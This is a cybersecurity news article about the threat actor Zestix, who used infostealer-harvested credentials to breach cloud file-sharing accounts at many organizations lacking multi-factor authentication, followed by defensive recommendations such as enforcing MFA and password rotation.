ownCloud Warns of Massive Credential Theft: Enable MFA Immediately

The most sophisticated cyberattacks don't require sophisticated exploits. A threat actor operating under the alias Zestix has demonstrated this principle by compromising dozens of major organizations using nothing more than stolen usernames and passwords - credentials that had been sitting in dark web databases for months or even years, waiting for someone to use them.

The common thread among all victims: none had enabled multi-factor authentication on their cloud file-sharing platforms.

The Credential Supply Chain

The attack chain exploiting these organizations is remarkably straightforward. It begins not with the target organizations themselves, but with individual employees whose personal or work computers become infected with infostealer malware.

Infostealers like RedLine, Lumma, and Vidar operate silently in the background, harvesting credentials from web browsers, messaging applications, and password managers. These malware variants spread through malvertising campaigns, fake software downloads, and ClickFix attacks that trick users into running malicious PowerShell commands.

Once harvested, stolen credentials flow into massive aggregation databases on the dark web. Some credentials had been present in these databases for years, waiting for an actor with the knowledge and motivation to exploit them. Zestix specifically targeted enterprise URLs for ShareFile, Nextcloud, and ownCloud - platforms where a single compromised account can expose terabytes of sensitive business data.

Scope of the Breach

Hudson Rock's investigation revealed compromises across virtually every sector where confidential data flows between organizations.

Intecro Robotics, a Turkish defense contractor, lost 11.5 GB of military blueprints including UAV designs and fighter jet schematics. Engineering firm Pickett & Associates saw 139 GB of LiDAR data and U.S. infrastructure plans exfiltrated. Brazilian healthcare provider Maida Health suffered the exposure of 2.3 TB of patient medical records.

The victim list extends to household names. Deloitte and KPMG face potential exposure of client audit files. Samsung, Honeywell, and Walmart all had corporate data accessed. Even the U.S. Centers for Disease Control saw confidential government documents compromised.

Perhaps most concerning, Indonesian satellite operator PSN lost 92 GB of data related to Boeing and SpaceX satellite operations.

The Credential Hygiene Failure

The Hudson Rock report highlights a critical finding that should alarm every IT administrator: the latency of the threat. While some credentials came from recently infected machines, others had been sitting in attacker databases for years. Organizations had multiple opportunities to rotate passwords, invalidate sessions, and implement MFA - and failed to do so.

The compromised organizations share common security failures. Password rotation policies were either nonexistent or unenforced, with some credentials unchanged for years. Session management was neglected, leaving authentication tokens active indefinitely. Most critically, multi-factor authentication - the single control that would have prevented these breaches - was never enabled.

Threat Actor Profile

Zestix, also known as Sentap, operates as an Initial Access Broker - a specialized cybercriminal who gains access to organizations and sells that access to other threat actors. According to research from DarkSignal and Hudson Rock, the actor is believed to be of Iranian origin and has been active since at least 2021.

The actor has affiliations with the Funksec cartel, a ransomware operation notable for incorporating generative AI into their attack tooling. This connection suggests that organizations breached through Zestix's credential exploitation may face ransomware attacks as a secondary monetization of the initial access.

Defensive Measures

The solution to credential-based attacks is straightforward but requires organizational commitment. MFA must be enabled on every cloud file-sharing platform without exception. This single control would have prevented every breach in the Zestix campaign.

Password rotation should be enforced through policy, not left to user discretion. Session tokens need defined lifetimes with automatic invalidation. Access logs require active monitoring for anomalous patterns - logins from unusual geolocations, impossible travel scenarios, or access outside normal business hours.

For preventing the initial infostealer infections that feed the credential pipeline, organizations should deploy endpoint detection and response solutions, restrict PowerShell execution on user workstations, and train employees to recognize ClickFix attacks that present fake system errors demanding command-line actions.

The Broader Implications

This campaign represents the industrialization of credential-based attacks. Zestix didn't need to discover vulnerabilities, develop exploits, or maintain sophisticated attack infrastructure. The threat actor simply purchased credentials that careless security practices had already exposed, then walked through the front door.

The message from ownCloud is unambiguous: MFA is no longer optional. It represents the final defensive barrier when credentials are compromised - an eventuality that, statistically, will affect most organizations eventually. The only question is whether that barrier will be in place when attackers come calling.

For managed service providers and enterprise administrators, the imperative is clear. Every file-sharing instance under your control should have MFA enforced today, not scheduled for a future security initiative.